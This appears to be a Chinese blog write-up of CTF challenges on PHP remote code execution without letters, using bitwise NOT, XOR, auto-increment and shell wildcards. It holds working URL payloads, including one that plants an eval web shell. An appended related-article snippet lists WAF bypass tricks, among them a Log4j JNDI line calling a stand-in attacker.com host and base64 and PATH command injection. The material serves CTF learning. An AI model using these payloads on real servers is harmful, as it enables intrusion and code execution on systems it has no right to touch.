无字母RCE绕过(取反,异或,自增,通配符)

最新推荐文章于 2025-02-09 20:11:35 发布
最新推荐文章于 2025-02-09 20:11:35 发布
阅读量1k 收藏 9
点赞数 13
文章标签: php 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_80307383/article/details/140725227
版权

原理参考:无数字字母rce总结(取反、异或、自增、临时文件)-优快云博客

RCE篇之无数字字母rce - 学安全的小白 - 博客园 (cnblogs.com)

RCE通配符绕过-优快云博客

以下是我的个人理解及例题

1.取反

例题:[SWPUCTF 2021 新生赛]hardrce | NSSCTF

取反用法就是对我们想要执行的语句通过取反符号"~"先准备好取反编码后语句,在通过(~)

写到url里达到绕过过滤a-z的目的,适用于没过滤"~"符号的题目

模型:?code=(语句1)(语句2)();

本题payload:

http://node5.anna.nssctf.cn:29866/?wllm=(~%8C%86%8C%8B%9A%92)(~%93%8C%DF%D0)();
http://node5.anna.nssctf.cn:29866/?wllm=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%93%93%93%93%9E%9E%9E%9E%9E%9E%98%98%98%98%98%98%98)();

 2.异或"^"

例题:BUUCTF在线评测 (buuoj.cn)里的RCEme(这题用取反也行)

异或“^”,通过该符号可以通过二进制异或操作将两个字符拼接为一个

规则:1^1=0,1^0=1,0^1=1,0^0=0

比如a的二进制是01100001

就可通过!         00100001

和          @          01000000

异或来得到

本题payload为

http://45462824-8ac4-45c7-aa10-db156ace2026.node5.buuoj.cn:81/?code=${%fe%fe%fe%fe^%a1%b9%bb%aa}[_](${%fe%fe%fe%fe^%a1%b9%bb%aa}[__]);&_=assert&__=eval($_POST[%27a%27])

但链接上蚁剑后,由于有disable_functions里面的flag文件无法读取,找的别人的wp

[极客大挑战 2019]RCE ME - 云千 - 博客园 (cnblogs.com)

3.自增

利用php中数组与字符串强制链接,数组会强制转化为Array这个字符,在通过+号来得到我们所需要的字符

例题:

[HNCTF 2022 Week1]Challenge__rce | NSSCTF

4.通配符

在Linux系统中可以使用 ? * 等字符来正则匹配字母星号

*号可以用来代替0个及以上任意字符

?号可以用来代替1个任意字符

例题:CTFHub里的hate_php

构造?><?= 语句?>

相当于?><?php echo 语句?>

本题payload:

?code=?><?=`/???/??? /????`?>

[网络安全自学篇] 六十三.hack the box渗透之OpenAdmin题目及蚁剑管理员提权(四)
杨秀璋的专栏
03-27 1万+
在撰写这篇文章之前,我先简单分享下hack the box实验感受。hack the box是一个在线渗透平台,模拟了真实环境且难度较大,各种Web渗透工具及操作串联在一起,挺有意思的。本文详细讲解了hack the box机器配置,通过OpenAdmin题目分享管理员权限Flag获取流程,希望对您有所帮助。同时,该网站题目细节不便于透露,推荐大家亲自去尝试,本文更多的分享一些思想。
[CTFSHOW]命令执行
热门推荐
Y4tacker的博客
11-20 1万+
文章目录web 29web 30web 31web32web40参考文章 web 29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 我这里只想到五种简便的方法: 通配符 payload1:c=syst
无参数 rce.md
04-01
记录一下,关于这次比赛的 wp >.< 并向大佬们积极学习 >.< 顺便混点分
字母数字rce总结(自取反异或、或、临时文件上传)
whale_waves的博客
02-29 2925
临时文件上传 通过上传文件然后用符号.调用执行文件 第一个知识点: 通过post上传文件,此时php会在linux里的零时文件夹保存文件,且文件一定是php加上六个随机的字符 /tmp/php?????? 这个应php保存的临时文件会有一个特性,就是这6个随机的字符会出现大写的情况 例如: 普通文件/tmp/adcabcabc php保存的临时文件/tmp/phpAvxAsa 第二个知识点: 现在直到了文件上传的位置以及特性那么现在要怎么利用它 shell下支持使用. 来
字母RCE
qq_64201116的博客
06-23 1934
字母RCE你到底有多懂,看了也许会更进一步
无数字字母rce总结(取反异或、自、临时文件)
A_991128a的博客
04-15 1205
目录取反异或或自临时文件大概思路有取反异或、自,临时文件推荐文章无字母数字webshell总结 - 先知社区如图示,对phpinfo取反,再取反,仍然得到phpinfo,但是可以利用它进行一些对数字字母过滤的绕过paylaod: (~%8F%97%8F%96%91%99%90)();像这样: shell: 异或 这里有一个异或构造的脚本, 相信聪明的你一看就知道怎么回事了 那么怎么利用呢? 像这样: 或 参考ctfshow web141payload大概这个样:?v1=1&v2=1&v3=%2b(“%
RCE-无字母数字绕过正则表达式
2301_78549931的博客
08-13 1476
我们可以通过一些不可见字符进行异或运算得到我们的字母(例如s=urldecode(%08)^urldecode(%7b)),这样是不是就绕过了waf。所以我们只需使用上述方法构造出system("ipconfig"),便可以执行命令,这里可以编写一个简单的php脚本来获取。根据源码,我们发现它过滤了字母数字大小写,所以我们要想实现代码执行,得另想方法构造代码执行。接下来我们可以使用py脚本来获取我们想要构造的payload:、取反的话,基本上用的都是一个不可见字符,所有不会触发到。
WEB攻防-RCE代码&命令执行&过滤绕过&异或无字符&无回显方案&黑白盒挖掘
weixin_45534587的博客
02-09 946
RCE,全称 Remote Code Execution,也就是远程代码执行。简单来说,它是一种非常危险的安全漏洞。正常情况下,我们访问一个网站或者使用某个应用程序,只能按照开发者设定好的功能来操作。但要是存在 RCE 漏洞,攻击者就能打破这种限制,在目标服务器上执行他们自己编写的代码。
ctfshow web40-web60系统命令执行 wp
qq_56158055的博客
01-13 557
事先声明,本文只用来学习交流,不参与以任何商业形式的活动。本文不会出现flag。 web40 源码 发现过滤了所有数字,以及大部分的字符,但仔细观察可以发现,括号是中文的括号,因此我们可以利用这点,来进行无参RCE 可以利用p神的无参数RCE来做,利用localeconv()函数来做,也可以用异或取反来做。 我这边用的是get_defined_vars()函数。 get_defined_vars():返回由所有已定义变量所组成的数组 因此我们可以 发现一堆乱七八糟的 利用
ctfshow web入门 命令执行web29-web57详解
2401_84009549的博客
04-20 965
当print_r(scandir(pos(localeconv())));时,会返回当前目录,pos(localeconv())的值为"."将数组用array_reverse进行倒转,并用next将指针指向flag.php最后进行读取,列出两个整理起来就是。
字母数字RCE
yourdawntown的博客
09-06 2151
版本为php5 php5中assert是一个函数,我们可以通过f=′assert′;f='assert';f=′assert′;f();这样的方法来动态执行任意代码。 但php7中,assert不再是函数,变成了一个语言结构(类似eval),不能再作为函数名动态执行代码,所以利用起来稍微复杂一点。但也无需过于担心,比如我们利用file_put_contents函数,同样可以用来getshell。 无数字和字母rce 测试代码 <?php if(!preg_match('/[a-z0-9]/is',
CTF-WEB-无数字字母rce
m0_74317362的博客
11-17 498
无数字字母rce,就和他的名字一样,就是不利用字母和数字构造webshell,从而绕过对方的过滤手段。对于无数字字母rce可以处理的过滤手段如下很明显,在这个程序中,数字和字符全部被过滤掉了,便排除了原来的手段。无数字字母rce的原理是什么呢,是利用各种非数字字母字符,经过各种变换,比如异或取反,自,构造成单个字母字符,然后把单个字母字符拼接成原构造的payload。
有回显代码执行-无字母数字RCE进阶PHP5
疯狂小伟哥的博客
04-16 1065
可以执行,符合正则匹配,但无法获取flag值;
RCE——远程命令执行(无字母数字篇)
m0_69151365的博客
08-10 1370
这道题属于是一个无字母无数字的题目,除了高版本的解法之外,我们更应该关注通用版本的解法,我们主要利用的php代码文件上传在代码执行完之前会存放在临时文件里,我们利用它的默认命名方式来进行一个正则匹配,而且Linux一般文件都不会用大写命名,从而写出这个正则来进行匹配。
无参函数的RCE
silence1_的博客
10-31 2528
无参函数的RCE 最近遇到挺多rce的题,这里记录一下关于无参函数的rce。 先看看代码: <?php if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']); } else { show_source(__FILE__); } ?> 很明了,...
RCE绕过方式
qq_73611706的博客
10-11 975
RCE绕过手法
rce绕过关键字
最新发布
04-03
<think>嗯,用户想了解RCE漏洞绕过的方法和关键技术点。首先,我需要回忆一下RCE的基本概念。RCE是远程代码执行,攻击者能够在目标系统上执行任意代码,危害极大。用户提到的绕过可能是指绕过现有的防御措施,比如WAF、输入过滤或者沙箱环境。 首先,我得考虑常见的绕过技术。比如,命令注入中的特殊字符绕过,像分号、管道符、反引号这些。有时候,黑名单过滤不完善,可以用编码或替换字符的方式绕过。比如,用十六进制编码或者Base64编码命令,然后解码执行。 然后,用户提供的引用里有提到CVE-2024-0012,是关于身份认证绕过导致RCE的案例。这可能涉及权限提升或认证机制中的漏洞,比如利用会话管理的问题或者Cookie篡改。另外,引用3提到Log4j漏洞,涉及JNDI注入,这类漏洞利用特定的协议或服务来触发,绕过检测可能需要混淆payload,比如使用非常规的协议格式或拆分攻击字符串。 还需要考虑上下文,比如输入验证的漏洞。如果应用对用户输入处理不当,未正确转义或过滤,攻击者可能通过构造特殊输入注入恶意代码。例如,在SQL注入中,使用注释符或大小写混合绕过,类似的方法可能适用于RCE绕过。 另外,环境变量注入也是一种可能。比如,通过控制环境变量参数来执行命令,某些程序可能会信任特定的环境变量,从而导致代码执行。还有,利用动态代码执行函数,如PHP的eval,Python的exec,如果用户输入直接传递给这些函数,没有严格过滤,就会导致RCE。 还有,框架或库的漏洞,比如旧版本的库存在已知漏洞,攻击者可以利用这些未修补的漏洞执行代码。例如,Apache Struts的漏洞曾被广泛利用。 现在要结合用户提供的引用,引用1提到代码审计和静态分析,所以在绕过时可能需要找到代码审计中的疏漏,比如未覆盖的边缘情况。引用2中的认证绕过导致RCE,说明权限提升或绕过认证步骤是关键。引用3中的Log4j漏洞检测被WAF拦截,所以绕过WAF可能需要混淆技术。 总结下来,RCE绕过的方法可能包括:命令注入绕过过滤、利用编码或混淆、认证/授权绕过、框架漏洞利用、上下文敏感攻击(如模板注入)、以及利用信任机制漏洞。 需要确保回答结构清晰,分点说明,每个技术点给出例子,并引用提供的资料。比如,在认证绕过部分引用CVE-2024-0012的例子,在Log4j部分提到引用3的检测方法。 还要注意用户要求使用中文,LaTeX格式的数学表达式,但这个问题可能不太涉及数学公式,所以可能不需要太多数学内容。但如果有涉及变量或代码部分,需要用行内格式,比如$command$。 最后生成相关问题,要围绕RCE绕过的扩展,比如防御措施、特定漏洞分析、检测技术等。</think>### RCE漏洞绕过方法及关键技术点分析 #### 一、常见RCE漏洞绕过方法 1. **命令注入绕过** - **特殊字符替换**:利用黑名单未覆盖的符号(如`$()`、`%0a`、反引号)拼接命令,例如: ```bash # 原始命令:cat /etc/passwd # 绕过形式:c'a't /et$@c/pass''wd ``` - **编码转换**:使用Base64、十六进制或URL编码混淆命令,例如: ```bash echo "bHM=" | base64 -d | sh # 解码后执行"ls" ``` 2. **输入过滤绕过** - **多级嵌套解析**:利用应用层协议(如HTTP参数污染、JSON/XML解析差异)注入恶意代码[^3]。 - **上下文敏感攻击**:在模板注入(SSTI)中,通过构造`${"".getClass().forName("...")}`绕过沙箱限制。 3. **认证/授权绕过** - **会话伪造**:通过Cookie篡改或JWT令牌伪造绕过身份验证(如CVE-2024-0012中的Web界面认证绕过)[^2]。 - **路径遍历**:利用未校验的路径参数访问敏感接口,例如`/admin/../api/exec?cmd=id`。 4. **框架/库漏洞利用** - **动态加载漏洞**:如Log4j的JNDI注入(`${jndi:ldap://attacker.com/exp}`),通过DNS查询混淆绕过WAF检测。 - **反序列化漏洞**:利用Java/Python的反序列化机制触发恶意代码,例如Apache Commons Collections的Gadget链。 #### 二、关键技术点 1. **漏洞链组合** 通过多个漏洞串联实现绕过,例如: - 先绕过认证(CVE-2024-0012)→ 再利用权限提升漏洞(CVE-2024-9474)→ 最终执行任意命令[^2]。 $$ \text{RCE} = \text{认证绕过} \oplus \text{权限提升} \oplus \text{命令执行} $$ 2. **环境依赖利用** 利用目标系统环境变量或依赖库的缺陷,例如: ```bash # 注入环境变量实现命令执行 curl http://target.com/api?input=;export PATH=/tmp:$PATH;malicious-bin ``` 3. **混淆与逃逸技术** - **WAF绕过**:通过分块传输、注释插入或Unicode编码绕过正则匹配,例如: ```http POST /api HTTP/1.1 Transfer-Encoding: chunked 3; x=x\r\ncmd\r\n0\r\n\r\n ``` - **代码混淆**:在PHP中使用`${_GET['a']}`动态调用函数,避免直接出现敏感关键词。 #### 三、防御建议 1. **输入严格校验**:使用白名单机制限制字符集,例如仅允许`[a-zA-Z0-9_]`。 2. **沙箱隔离**:对动态代码执行操作进行资源隔离(如Docker容器)。 3. **依赖库更新**:定期升级框架/库版本(如Log4j升级到2.17.0+)。 4. **纵深防御**:结合WAF、RASP(运行时应用自保护)和代码审计[^1]。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值